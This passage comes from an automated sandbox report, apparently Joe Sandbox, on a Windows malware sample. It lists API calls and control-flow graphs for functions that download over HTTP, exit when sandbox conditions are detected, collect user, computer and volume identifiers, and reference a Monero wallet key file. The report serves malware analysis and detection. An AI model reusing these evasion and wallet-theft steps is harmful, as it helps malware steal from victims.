                              • GetProcAddress.KERNEL32(6F070000,01495B30), ref: 001DA591
                              • GetProcAddress.KERNEL32(6F070000,01495C50), ref: 001DA5A9
                              • GetProcAddress.KERNEL32(6F070000,01495C30), ref: 001DA5C2
                              • GetProcAddress.KERNEL32(6F070000,01495B50), ref: 001DA5DA
                              • GetProcAddress.KERNEL32(6F070000,InternetSetOptionA), ref: 001DA5F1
                              • GetProcAddress.KERNEL32(6F070000,HttpQueryInfoA), ref: 001DA607
                              • GetProcAddress.KERNEL32(75AF0000,014AD200), ref: 001DA629
                              • GetProcAddress.KERNEL32(75AF0000,014A8FB8), ref: 001DA641
                              • GetProcAddress.KERNEL32(75AF0000,014AD2D8), ref: 001DA659
                              • GetProcAddress.KERNEL32(75AF0000,014AD260), ref: 001DA672
                              • GetProcAddress.KERNEL32(75D90000,01495BD0), ref: 001DA693
                              • GetProcAddress.KERNEL32(6CFA0000,014AD320), ref: 001DA6B4
                              • GetProcAddress.KERNEL32(6CFA0000,01495AB0), ref: 001DA6CD
                              • GetProcAddress.KERNEL32(6CFA0000,014AD2F0), ref: 001DA6E5
                              • GetProcAddress.KERNEL32(6CFA0000,014AD350), ref: 001DA6FD
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1770548297.00000000001C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                              • Associated: 00000000.00000002.1770511538.00000000001C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1770548297.0000000000271000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1770548297.000000000027D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1770548297.00000000002A2000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1770548297.000000000040A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1770738342.000000000041E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1770738342.00000000005A8000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1770738342.000000000067E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1770738342.00000000006A0000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1770738342.00000000006AB000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1770738342.00000000006B9000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1771022720.00000000006BA000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1771139237.000000000084F000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1771155711.0000000000850000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_1c0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: AddressProc$LibraryLoad
                              • String ID: HttpQueryInfoA$InternetSetOptionA
                              • API String ID: 2238633743-1775429166
                              • Opcode ID: af9197872abccc924e69e03b4f269d4d4cdc9b4e54c9a26aa0e992b9e4e474ab
                              • Instruction ID: 4d0d9ae3543f3bea1dbf420a71b3a124d013330d9a8c6628a002ba910e9c9e60
                              • Opcode Fuzzy Hash: af9197872abccc924e69e03b4f269d4d4cdc9b4e54c9a26aa0e992b9e4e474ab
                              • Instruction Fuzzy Hash: 99621CB6510300AFC344EFA8EF8895677F9F78C301714C53AA609E3264D739A865DF6A
                              Function 001C6280 Relevance: 24.7, APIs: 11, Strings: 3, Instructions: 191networkfileCOMMON
                              Download Yara Rule

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 1033 1c6280-1c630b call 1da7a0 call 1c47b0 call 1da740 InternetOpenA StrCmpCA 1040 1c630d 1033->1040 1041 1c6314-1c6318 1033->1041 1040->1041 1042 1c631e-1c6342 InternetConnectA 1041->1042 1043 1c6509-1c6525 call 1da7a0 call 1da800 * 2 1041->1043 1045 1c64ff-1c6503 InternetCloseHandle 1042->1045 1046 1c6348-1c634c 1042->1046 1062 1c6528-1c652d 1043->1062 1045->1043 1048 1c634e-1c6358 1046->1048 1049 1c635a 1046->1049 1050 1c6364-1c6392 HttpOpenRequestA 1048->1050 1049->1050 1052 1c6398-1c639c 1050->1052 1053 1c64f5-1c64f9 InternetCloseHandle 1050->1053 1055 1c639e-1c63bf InternetSetOptionA 1052->1055 1056 1c63c5-1c6405 HttpSendRequestA HttpQueryInfoA 1052->1056 1053->1045 1055->1056 1058 1c642c-1c644b call 1d8940 1056->1058 1059 1c6407-1c6427 call 1da740 call 1da800 * 2 1056->1059 1067 1c644d-1c6454 1058->1067 1068 1c64c9-1c64e9 call 1da740 call 1da800 * 2 1058->1068 1059->1062 1069 1c6456-1c6480 InternetReadFile 1067->1069 1070 1c64c7-1c64ef InternetCloseHandle 1067->1070 1068->1062 1073 1c648b 1069->1073 1074 1c6482-1c6489 1069->1074 1070->1053 1073->1070 1074->1073 1078 1c648d-1c64c5 call 1da9b0 call 1da8a0 call 1da800 1074->1078 1078->1069
                              APIs
                                • Part of subcall function 001DA7A0: lstrcpy.KERNEL32(?,00000000), ref: 001DA7E6
                                • Part of subcall function 001C47B0: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 001C4839
                                • Part of subcall function 001C47B0: InternetCrackUrlA.WININET(00000000,00000000), ref: 001C4849
                                • Part of subcall function 001DA740: lstrcpy.KERNEL32(001E0E17,00000000), ref: 001DA788
                              • InternetOpenA.WININET(001E0DFE,00000001,00000000,00000000,00000000), ref: 001C62E1
                              • StrCmpCA.SHLWAPI(?,014AE9B8), ref: 001C6303
                              • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 001C6335
                              • HttpOpenRequestA.WININET(00000000,GET,?,014AE110,00000000,00000000,00400100,00000000), ref: 001C6385
                              • InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 001C63BF
                              • HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 001C63D1
                              • HttpQueryInfoA.WININET(00000000,00000013,?,00000100,00000000), ref: 001C63FD
                              • InternetReadFile.WININET(00000000,?,000007CF,?), ref: 001C646D
                              • InternetCloseHandle.WININET(00000000), ref: 001C64EF
                              • InternetCloseHandle.WININET(00000000), ref: 001C64F9
                              • InternetCloseHandle.WININET(00000000), ref: 001C6503
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1770548297.00000000001C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                              • Associated: 00000000.00000002.1770511538.00000000001C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1770548297.0000000000271000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1770548297.000000000027D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1770548297.00000000002A2000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1770548297.000000000040A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1770738342.000000000041E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1770738342.00000000005A8000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1770738342.000000000067E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1770738342.00000000006A0000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1770738342.00000000006AB000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1770738342.00000000006B9000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1771022720.00000000006BA000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1771139237.000000000084F000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1771155711.0000000000850000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_1c0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Internet$CloseHandleHttp$OpenRequestlstrcpy$ConnectCrackFileInfoOptionQueryReadSendlstrlen
                              • String ID: ERROR$ERROR$GET
                              • API String ID: 3749127164-2509457195
                              • Opcode ID: d38943fd44b17974666f1171b838aa44bf8ac7edb62a6589565f38f2c08e8833
                              • Instruction ID: 63c63a5e952511414adeff31252e7845634c8e2e5646df24ce3a53c64f0e5449
                              • Opcode Fuzzy Hash: d38943fd44b17974666f1171b838aa44bf8ac7edb62a6589565f38f2c08e8833
                              • Instruction Fuzzy Hash: 1A716D71A00358ABDB14DBA0CC49FEE7778BF54700F5081A9F50A6B290DBB4AA85CF56
                              Function 001D5510 Relevance: 23.1, APIs: 7, Strings: 6, Instructions: 383sleepCOMMON
                              Download Yara Rule

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 1090 1d5510-1d5577 call 1d5ad0 call 1da820 * 3 call 1da740 * 4 1106 1d557c-1d5583 1090->1106 1107 1d5585-1d55b6 call 1da820 call 1da7a0 call 1c1590 call 1d51f0 1106->1107 1108 1d55d7-1d564c call 1da740 * 2 call 1c1590 call 1d52c0 call 1da8a0 call 1da800 call 1daad0 StrCmpCA 1106->1108 1123 1d55bb-1d55d2 call 1da8a0 call 1da800 1107->1123 1134 1d5693-1d56a9 call 1daad0 StrCmpCA 1108->1134 1138 1d564e-1d568e call 1da7a0 call 1c1590 call 1d51f0 call 1da8a0 call 1da800 1108->1138 1123->1134 1139 1d57dc-1d5844 call 1da8a0 call 1da820 * 2 call 1c1670 call 1da800 * 4 call 1d6560 call 1c1550 1134->1139 1140 1d56af-1d56b6 1134->1140 1138->1134 1269 1d5ac3-1d5ac6 1139->1269 1142 1d56bc-1d56c3 1140->1142 1143 1d57da-1d585f call 1daad0 StrCmpCA 1140->1143 1146 1d571e-1d5793 call 1da740 * 2 call 1c1590 call 1d52c0 call 1da8a0 call 1da800 call 1daad0 StrCmpCA 1142->1146 1147 1d56c5-1d5719 call 1da820 call 1da7a0 call 1c1590 call 1d51f0 call 1da8a0 call 1da800 1142->1147 1162 1d5865-1d586c 1143->1162 1163 1d5991-1d59f9 call 1da8a0 call 1da820 * 2 call 1c1670 call 1da800 * 4 call 1d6560 call 1c1550 1143->1163 1146->1143 1246 1d5795-1d57d5 call 1da7a0 call 1c1590 call 1d51f0 call 1da8a0 call 1da800 1146->1246 1147->1143 1168 1d598f-1d5a14 call 1daad0 StrCmpCA 1162->1168 1169 1d5872-1d5879 1162->1169 1163->1269 1198 1d5a28-1d5a91 call 1da8a0 call 1da820 * 2 call 1c1670 call 1da800 * 4 call 1d6560 call 1c1550 1168->1198 1199 1d5a16-1d5a21 Sleep 1168->1199 1175 1d587b-1d58ce call 1da820 call 1da7a0 call 1c1590 call 1d51f0 call 1da8a0 call 1da800 1169->1175 1176 1d58d3-1d5948 call 1da740 * 2 call 1c1590 call 1d52c0 call 1da8a0 call 1da800 call 1daad0 StrCmpCA 1169->1176 1175->1168 1176->1168 1274 1d594a-1d598a call 1da7a0 call 1c1590 call 1d51f0 call 1da8a0 call 1da800 1176->1274 1198->1269 1199->1106 1246->1143 1274->1168
                              APIs
                                • Part of subcall function 001DA820: lstrlen.KERNEL32(001C4F05,?,?,001C4F05,001E0DDE), ref: 001DA82B
                                • Part of subcall function 001DA820: lstrcpy.KERNEL32(001E0DDE,00000000), ref: 001DA885
                                • Part of subcall function 001DA740: lstrcpy.KERNEL32(001E0E17,00000000), ref: 001DA788
                              • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 001D5644
                              • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 001D56A1
                              • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 001D5857
                                • Part of subcall function 001DA7A0: lstrcpy.KERNEL32(?,00000000), ref: 001DA7E6
                                • Part of subcall function 001D51F0: StrCmpCA.SHLWAPI(00000000,ERROR), ref: 001D5228
                                • Part of subcall function 001DA8A0: lstrcpy.KERNEL32(?,001E0E17), ref: 001DA905
                                • Part of subcall function 001D52C0: StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 001D5318
                                • Part of subcall function 001D52C0: lstrlen.KERNEL32(00000000), ref: 001D532F
                                • Part of subcall function 001D52C0: StrStrA.SHLWAPI(00000000,00000000), ref: 001D5364
                                • Part of subcall function 001D52C0: lstrlen.KERNEL32(00000000), ref: 001D5383
                                • Part of subcall function 001D52C0: lstrlen.KERNEL32(00000000), ref: 001D53AE
                              • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 001D578B
                              • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 001D5940
                              • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 001D5A0C
                              • Sleep.KERNEL32(0000EA60), ref: 001D5A1B
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1770548297.00000000001C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                              • Associated: 00000000.00000002.1770511538.00000000001C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1770548297.0000000000271000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1770548297.000000000027D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1770548297.00000000002A2000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1770548297.000000000040A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1770738342.000000000041E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1770738342.00000000005A8000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1770738342.000000000067E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1770738342.00000000006A0000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1770738342.00000000006AB000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1770738342.00000000006B9000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1771022720.00000000006BA000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1771139237.000000000084F000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1771155711.0000000000850000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_1c0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcpylstrlen$Sleep
                              • String ID: ERROR$ERROR$ERROR$ERROR$ERROR$ERROR
                              • API String ID: 507064821-2791005934
                              • Opcode ID: 948b29ce05f72a2bb61a3a39cb1ae68c0527fa5fac63e0e87d4fcf5d74970f96
                              • Instruction ID: 8d15e22a190222905b3b0bd1e0a468d077639097251ff822dfa396082b00f2a4
                              • Opcode Fuzzy Hash: 948b29ce05f72a2bb61a3a39cb1ae68c0527fa5fac63e0e87d4fcf5d74970f96
                              • Instruction Fuzzy Hash: 8CE14772910144AACB14FBA0DD92EED7339AF74301F90812AF40667291EF35AF19DB96
                              Function 001D17A0 Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 162COMMON
                              Download Yara Rule

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 1301 1d17a0-1d17cd call 1daad0 StrCmpCA 1304 1d17cf-1d17d1 ExitProcess 1301->1304 1305 1d17d7-1d17f1 call 1daad0 1301->1305 1309 1d17f4-1d17f8 1305->1309 1310 1d17fe-1d1811 1309->1310 1311 1d19c2-1d19cd call 1da800 1309->1311 1313 1d199e-1d19bd 1310->1313 1314 1d1817-1d181a 1310->1314 1313->1309 1316 1d185d-1d186e StrCmpCA 1314->1316 1317 1d187f-1d1890 StrCmpCA 1314->1317 1318 1d1835-1d1844 call 1da820 1314->1318 1319 1d18f1-1d1902 StrCmpCA 1314->1319 1320 1d1951-1d1962 StrCmpCA 1314->1320 1321 1d1970-1d1981 StrCmpCA 1314->1321 1322 1d1913-1d1924 StrCmpCA 1314->1322 1323 1d1932-1d1943 StrCmpCA 1314->1323 1324 1d18ad-1d18be StrCmpCA 1314->1324 1325 1d18cf-1d18e0 StrCmpCA 1314->1325 1326 1d198f-1d1999 call 1da820 1314->1326 1327 1d1849-1d1858 call 1da820 1314->1327 1328 1d1821-1d1830 call 1da820 1314->1328 1342 1d187a 1316->1342 1343 1d1870-1d1873 1316->1343 1344 1d189e-1d18a1 1317->1344 1345 1d1892-1d189c 1317->1345 1318->1313 1350 1d190e 1319->1350 1351 1d1904-1d1907 1319->1351 1333 1d196e 1320->1333 1334 1d1964-1d1967 1320->1334 1336 1d198d 1321->1336 1337 1d1983-1d1986 1321->1337 1329 1d1926-1d1929 1322->1329 1330 1d1930 1322->1330 1331 1d194f 1323->1331 1332 1d1945-1d1948 1323->1332 1346 1d18ca 1324->1346 1347 1d18c0-1d18c3 1324->1347 1348 1d18ec 1325->1348 1349 1d18e2-1d18e5 1325->1349 1326->1313 1327->1313 1328->1313 1329->1330 1330->1313 1331->1313 1332->1331 1333->1313 1334->1333 1336->1313 1337->1336 1342->1313 1343->1342 1355 1d18a8 1344->1355 1345->1355 1346->1313 1347->1346 1348->1313 1349->1348 1350->1313 1351->1350 1355->1313
                              APIs
                              • StrCmpCA.SHLWAPI(00000000,block), ref: 001D17C5
                              • ExitProcess.KERNEL32 ref: 001D17D1
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1770548297.00000000001C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                              • Associated: 00000000.00000002.1770511538.00000000001C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1770548297.0000000000271000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1770548297.000000000027D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1770548297.00000000002A2000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1770548297.000000000040A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1770738342.000000000041E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1770738342.00000000005A8000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1770738342.000000000067E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1770738342.00000000006A0000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1770738342.00000000006AB000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1770738342.00000000006B9000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1771022720.00000000006BA000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1771139237.000000000084F000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1771155711.0000000000850000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_1c0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: ExitProcess
                              • String ID: block
                              • API String ID: 621844428-2199623458
                              • Opcode ID: 75085fe1ac08a5c4673048ed3e2da7c03d9f7657c5e719c0686aba111267aa3b
                              • Instruction ID: 3b5545bfde25496e994b35395ece2a6ae118fc99518c2b14f2548c027678cf54
                              • Opcode Fuzzy Hash: 75085fe1ac08a5c4673048ed3e2da7c03d9f7657c5e719c0686aba111267aa3b
                              • Instruction Fuzzy Hash: 9C514DB5A0420AFFCB08DFE1D9A4ABE77B5BF44708F10905AE406A7350D770EA51DB62
                              Function 001D7500 Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 106memoryCOMMON
                              Download Yara Rule

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 1356 1d7500-1d754a GetWindowsDirectoryA 1357 1d754c 1356->1357 1358 1d7553-1d75c7 GetVolumeInformationA call 1d8d00 * 3 1356->1358 1357->1358 1365 1d75d8-1d75df 1358->1365 1366 1d75fc-1d7617 GetProcessHeap RtlAllocateHeap 1365->1366 1367 1d75e1-1d75fa call 1d8d00 1365->1367 1369 1d7619-1d7626 call 1da740 1366->1369 1370 1d7628-1d7658 wsprintfA call 1da740 1366->1370 1367->1365 1377 1d767e-1d768e 1369->1377 1370->1377
                              APIs
                              • GetWindowsDirectoryA.KERNEL32(?,00000104), ref: 001D7542
                              • GetVolumeInformationA.KERNEL32(?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 001D757F
                              • GetProcessHeap.KERNEL32(00000000,00000104), ref: 001D7603
                              • RtlAllocateHeap.NTDLL(00000000), ref: 001D760A
                              • wsprintfA.USER32 ref: 001D7640
                                • Part of subcall function 001DA740: lstrcpy.KERNEL32(001E0E17,00000000), ref: 001DA788
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1770548297.00000000001C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                              • Associated: 00000000.00000002.1770511538.00000000001C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1770548297.0000000000271000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1770548297.000000000027D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1770548297.00000000002A2000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1770548297.000000000040A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1770738342.000000000041E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1770738342.00000000005A8000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1770738342.000000000067E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1770738342.00000000006A0000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1770738342.00000000006AB000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1770738342.00000000006B9000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1771022720.00000000006BA000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1771139237.000000000084F000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1771155711.0000000000850000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_1c0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Heap$AllocateDirectoryInformationProcessVolumeWindowslstrcpywsprintf
                              • String ID: :$C$\
                              • API String ID: 1544550907-3809124531
                              • Opcode ID: 1c229ff4ad43a190641dbdd6504134e5174b0b4f925bb6b45d2333002f14749b
                              • Instruction ID: ac925e86425f109bf996a0a4a0a7a367a429866c99c26f13d6bbf8797ee8b4dd
                              • Opcode Fuzzy Hash: 1c229ff4ad43a190641dbdd6504134e5174b0b4f925bb6b45d2333002f14749b
                              • Instruction Fuzzy Hash: 024181B1D04358ABDB10DF94DC45BEEBBB8AF18704F10419AF509772C0E775AA44CBA5
                              Function 001D69F0 Relevance: 9.1, APIs: 6, Instructions: 89sleepCOMMON
                              Download Yara Rule

                              Control-flow Graph

                              APIs
                                • Part of subcall function 001D9860: GetProcAddress.KERNEL32(74DD0000,014A23B0), ref: 001D98A1
                                • Part of subcall function 001D9860: GetProcAddress.KERNEL32(74DD0000,014A2308), ref: 001D98BA
                                • Part of subcall function 001D9860: GetProcAddress.KERNEL32(74DD0000,014A2440), ref: 001D98D2
                                • Part of subcall function 001D9860: GetProcAddress.KERNEL32(74DD0000,014A2458), ref: 001D98EA
                                • Part of subcall function 001D9860: GetProcAddress.KERNEL32(74DD0000,014A22A8), ref: 001D9903
                                • Part of subcall function 001D9860: GetProcAddress.KERNEL32(74DD0000,014A90C8), ref: 001D991B
                                • Part of subcall function 001D9860: GetProcAddress.KERNEL32(74DD0000,01495910), ref: 001D9933
                                • Part of subcall function 001D9860: GetProcAddress.KERNEL32(74DD0000,01495750), ref: 001D994C
                                • Part of subcall function 001D9860: GetProcAddress.KERNEL32(74DD0000,014A2470), ref: 001D9964
                                • Part of subcall function 001D9860: GetProcAddress.KERNEL32(74DD0000,014A24D0), ref: 001D997C
                                • Part of subcall function 001D9860: GetProcAddress.KERNEL32(74DD0000,014A2488), ref: 001D9995
                                • Part of subcall function 001D9860: GetProcAddress.KERNEL32(74DD0000,014A2248), ref: 001D99AD
                                • Part of subcall function 001D9860: GetProcAddress.KERNEL32(74DD0000,014958D0), ref: 001D99C5
                                • Part of subcall function 001D9860: GetProcAddress.KERNEL32(74DD0000,014A2278), ref: 001D99DE
                                • Part of subcall function 001DA740: lstrcpy.KERNEL32(001E0E17,00000000), ref: 001DA788
                                • Part of subcall function 001C11D0: ExitProcess.KERNEL32 ref: 001C1211
                                • Part of subcall function 001C1160: GetSystemInfo.KERNEL32(?), ref: 001C116A
                                • Part of subcall function 001C1160: ExitProcess.KERNEL32 ref: 001C117E
                                • Part of subcall function 001C1110: GetCurrentProcess.KERNEL32(00000000,000007D0,00003000,00000040,00000000), ref: 001C112B
                                • Part of subcall function 001C1110: VirtualAllocExNuma.KERNEL32(00000000), ref: 001C1132
                                • Part of subcall function 001C1110: ExitProcess.KERNEL32 ref: 001C1143
                                • Part of subcall function 001C1220: GlobalMemoryStatusEx.KERNEL32(00000040,?,00000000,00000040), ref: 001C123E
                                • Part of subcall function 001C1220: ExitProcess.KERNEL32 ref: 001C1294
                                • Part of subcall function 001D6770: GetUserDefaultLangID.KERNEL32 ref: 001D6774
                                • Part of subcall function 001C1190: ExitProcess.KERNEL32 ref: 001C11C6
                                • Part of subcall function 001D7850: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,001C11B7), ref: 001D7880
                                • Part of subcall function 001D7850: RtlAllocateHeap.NTDLL(00000000), ref: 001D7887
                                • Part of subcall function 001D7850: GetUserNameA.ADVAPI32(00000104,00000104), ref: 001D789F
                                • Part of subcall function 001D78E0: GetProcessHeap.KERNEL32(00000000,00000104), ref: 001D7910
                                • Part of subcall function 001D78E0: RtlAllocateHeap.NTDLL(00000000), ref: 001D7917
                                • Part of subcall function 001D78E0: GetComputerNameA.KERNEL32(?,00000104), ref: 001D792F
                                • Part of subcall function 001DA9B0: lstrlen.KERNEL32(?,014A91F8,?,\Monero\wallet.keys,001E0E17), ref: 001DA9C5
                                • Part of subcall function 001DA9B0: lstrcpy.KERNEL32(00000000), ref: 001DAA04
                                • Part of subcall function 001DA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 001DAA12
                                • Part of subcall function 001DA8A0: lstrcpy.KERNEL32(?,001E0E17), ref: 001DA905
                              • OpenEventA.KERNEL32(001F0003,00000000,00000000,00000000,?,014A90D8,?,001E110C,?,00000000,?,001E1110,?,00000000,001E0AEF), ref: 001D6ACA
                              • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 001D6AE8
                              • CloseHandle.KERNEL32(00000000), ref: 001D6AF9
                              • Sleep.KERNEL32(00001770), ref: 001D6B04
                              • CloseHandle.KERNEL32(?,00000000,?,014A90D8,?,001E110C,?,00000000,?,001E1110,?,00000000,001E0AEF), ref: 001D6B1A
                              • ExitProcess.KERNEL32 ref: 001D6B22
                              Memory Dump Source
                              • Source File: 00000000.00000002.1770548297.00000000001C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                              • Associated: 00000000.00000002.1770511538.00000000001C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1770548297.0000000000271000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1770548297.000000000027D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1770548297.00000000002A2000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1770548297.000000000040A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1770738342.000000000041E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1770738342.00000000005A8000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1770738342.000000000067E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1770738342.00000000006A0000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1770738342.00000000006AB000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1770738342.00000000006B9000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1771022720.00000000006BA000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1771139237.000000000084F000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1771155711.0000000000850000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_1c0000_file.jbxd
                              Yara matches
                              Similarity
